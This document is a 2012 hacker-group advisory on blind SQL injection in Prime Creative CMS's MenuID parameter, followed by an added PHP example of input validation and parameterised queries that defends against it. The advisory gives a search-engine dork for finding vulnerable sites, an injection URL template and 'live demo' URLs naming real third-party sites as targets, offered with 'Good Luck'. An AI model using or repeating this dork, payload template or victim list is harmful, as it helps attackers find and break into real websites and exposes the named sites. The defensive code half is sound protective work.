010101010101010101010101010101010101010101010101010101010
0 0
1 Iranian Datacoders Security Team 2010 1
0 0
1 WWW.DataCoders.Org 1
010101010101010101010101010101010101010101010101010101010
############################################################################
# Exploit Title: prime creative CMS BSQL Injection Vulnerability #
# Date: 03/26/2012 #
# Author: H-SK33PY #
# Vendor Link: http://www.primecreative.com/ #
# Version : N/A #
# Platform / Tested on: php/linux #
# Dork: inurl:index.php?MenuID= & intext:developed by prime creative #
# Category: webapplications #
# Code : [SQL injection] #
# Our Website: http://www.datacoders.org/ #
############################################################################
After using the string (') and finding the injection bug on a site, run the SQL injection:
Example:
http://[PATH]/index.php?MenuID=[BSQL injection]
Live demo :
http://www.snugpak.com/index.php?MenuID=160-133[bsql injection]
http://www.netherleighandrossefieldschool.co.uk/index.php?MenuID=-168[bsql injection]
http://testing.primecreative.com/ocean/index.php?MenuID=288-288-288[bsql injection]
Good Luck
############################################################################################
# #
# We Are: H-SK33PY | Immortal Boy | D4rkC0d3 | r00t | v30sharp | ARTA #
# #
# And All Iranian DataCoders Members #
# #
# Don't Forget WwW.DataCoders.Org #
############################################################################################
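
A defensive handler for the MenuID parameter described above, added here as an example; it is not code from the advisory or from the vendor's CMS. It assumes MenuID is meant to be a positive integer key, and the `menu` table, its columns and the function names are hypothetical. Values carrying arithmetic or quotes, like the shapes listed in the advisory, are rejected before any query runs, and the accepted value is bound as a typed parameter.

```php
<?php
declare(strict_types=1);

// Hypothetical schema standing in for the CMS menu table (constructed sample data).
function demoDb(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE menu (id INTEGER PRIMARY KEY, title TEXT)');
    $pdo->exec("INSERT INTO menu (id, title) VALUES (27, 'Products'), (160, 'Contact')");
    return $pdo;
}

// Accept only a plain decimal integer: digits only, no sign, operators, spaces or quotes.
function parseMenuId(mixed $raw): ?int {
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return null;
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

// Look the menu up with a bound, typed parameter; the value never becomes SQL text.
function findMenuTitle(PDO $pdo, mixed $rawMenuId): ?string {
    $id = parseMenuId($rawMenuId);
    if ($id === null) {
        return null; // caller should answer 400/404 and log the rejected value
    }
    $stmt = $pdo->prepare('SELECT title FROM menu WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $title = $stmt->fetchColumn();
    return $title === false ? null : (string) $title;
}

$pdo = demoDb();
// Constructed inputs: one valid id, then the value shapes listed in the advisory.
foreach (['160', '160-133', '-168', '288-288-288', "160'"] as $value) {
    $title = findMenuTitle($pdo, $value);
    printf("MenuID=%-12s => %s\n", $value, $title ?? 'rejected / not found');
}
```

In a real handler the raw value would come from `$_GET['MenuID'] ?? null`; rejected values are worth logging, since a non-numeric MenuID is a cheap signal of probing.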